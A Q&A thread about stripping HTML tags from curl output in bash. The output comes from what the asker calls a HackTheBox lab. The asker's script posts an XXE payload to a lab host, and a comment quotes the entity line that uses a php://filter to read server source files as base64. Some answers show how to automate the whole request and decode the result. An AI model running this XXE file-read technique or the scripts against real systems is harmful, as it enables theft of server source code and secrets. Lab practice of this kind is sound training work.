How can I remove HTML from a string in bash?

Question

I am trying to remove the <td> and </td> from a curl output. The output gives a table view that looks like this:

If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>dsf</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
  <tr>
    <td>Score:</td>
    <td>fdsf</td>
  </tr>
  <tr>
    <td>Reward:</td>
    <td>dsfsdf</td>
  </tr>
</table>

Under the CWE: column is some base64 I want to decode. Here is what I have tried:

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file

# sed: -e expression #1, char 9: unknown option to `s'
cat file | grep "<td>" | sed 's/<td>//g'| sed 's/</td>//g' | sed '1,3d' | sed '2,5d' | tr -d " "

Only, I keep getting

sed: -e expression #1, char 9: unknown option to `s'

on the cat file line.

Update: Using xmllint

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file
xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file|sed '1,1d')

Gives me this:

warning: failed to load external entity "<table>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Title:</td>"
warning: failed to load external entity "<td>dsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>CWE:</td>"
warning: failed to load external entity "<td>BASE 64 WOULD BE HERE</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Score:</td>"
warning: failed to load external entity "<td>fdsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Reward:</td>"
warning: failed to load external entity "<td>dsfsdf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "</table>"

Update more:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | sed '1, 1d' | xmllint --html --xpath /table/tbody/tr[2]/td[2] -

XPath set is empty

Do you have a compelling reason not to use HTML-aware tools for this? Python ships with several lxml libraries, and modern Linux distros include xmllint and similar tools that can be run from the command line. See f/e xmllint to parse a html file — Charles Duffy
– Charles Duffy, Commented Aug 12, 2021 at 17:21
xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file) isn't working @CharlesDuffy — Jaquarh
– Jaquarh, Commented Aug 12, 2021 at 17:30
$(cat file)? Of course it wouldn't work -- that reads your input file, breaks it into individual command line arguments and puts them on xmllint's command line. Why would you ever want to do that? Use the linked question's answers the way it says to use them, don't make up your own broken thing and then ask why it's broken. — Charles Duffy
– Charles Duffy, Commented Aug 12, 2021 at 17:31
Don't Parse XML/HTML With Regex. I suggest to use an XML/HTML parser (xmlstarlet, xmllint ...). — Cyrus
– Cyrus, Commented Aug 12, 2021 at 17:33
while we've got some sample input: If DB were ready ... </table>, we don't have the matching expected output; please update the question with the expected output — markp-fuso
– markp-fuso, Commented Aug 12, 2021 at 17:33

markp-fuso · Accepted Answer · 2021-08-12 17:58:09Z

2

Addressing the (original) issue of the sed error:

sed 's/</td>//g
using / as a delimiter but / is also part of the string to be replaced
net result: sed sees an extra / which is a syntax issue
either switch to another delimiter that doesn't show up in the data (eg, |) or escape the data (eg, <\/td>)

As for the bigger picture (parsing out the CWE: value) ...

Assuming an HTML-aware tool is not available, there's only one CWE: in the input, and the input is nicely formatted as shown, replace the cat/grep/sed/sed/sed/sed/tr mess and let awk do the work, eg:

awk -F'[<>]' '$3 ~ "CWE:" {printme=1;next} printme {print $3; exit}' file

This generates:

SSBBTSBTT01FIEJBU0U2NAo=

edited Aug 12, 2021 at 17:58

answered Aug 12, 2021 at 17:50

markp-fuso

38.6k5 gold badges24 silver badges48 bronze badges

Sign up to request clarification or add additional context in comments.

8 Comments

Charles Duffy Over a year ago

Using a syntax-unaware tool to "parse" a list of security vulnerabilities is rich.

Jaquarh Over a year ago

Thankyou!! My XXE uses php:// filter to generate base64 encoded source files from the server: <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=./PLACEHOLDER" >]> so I can now automatically just scrape the source code! I appreciate it!

markp-fuso Over a year ago

@CharlesDuffy uh, yep, and if OP is lucky it'll never bite 'em in the arse :-)

Jaquarh Over a year ago

its a hackthebox lab, not real world. I just like to automate my tools for the writeups @markp-fuso

Charles Duffy Over a year ago

@Jaquarh, ...point of a lab is to teach you skills you can use in the real world, though.

|

Pierre François · Accepted Answer · 2021-08-13 13:51:25Z

2

For extracting data from html files (supposing it is well formed XML), you better try this one liner:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | xmllint --xpath '//td[text() = "CWE:"]/following-sibling::td/text()' | base64 -d

edited Aug 13, 2021 at 13:51

answered Aug 12, 2021 at 18:00

Pierre François

6,1681 gold badge21 silver badges42 bronze badges

Comments

Reino · Accepted Answer · 2021-08-14 22:21:19Z

Please don't use RegEx to parse HTML, but use an HTML parser like xidel instead.

The final bit, extracting and decoding the base64 string:

$ xidel -s file -e '
  //td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
I AM SOME BASE64

Despite not knowing the content of your 'xxe.txt', xidel can probably also do all those steps for you:

$ xidel -s \
  -d 'data={file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>"))}' \
  "http://10.10.11.100/tracker_diRbPr00f314.php" \
  -e '//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))'

or

$ xidel -se '
  x:request({
    "post":"data="||file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>")),
    "url":"http://10.10.11.100/tracker_diRbPr00f314.php"
  })/doc//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'

Collectives™ on Stack Overflow

How can I remove HTML from a string in bash?

3 Answers 3

8 Comments

Comments

Comments

Your Answer

Linked

Hot Network Questions

Collectives™ on Stack Overflow

3 Answers 3

8 Comments

Comments

Comments

Your Answer

Sign up or log in

Post as a guest

Linked

Related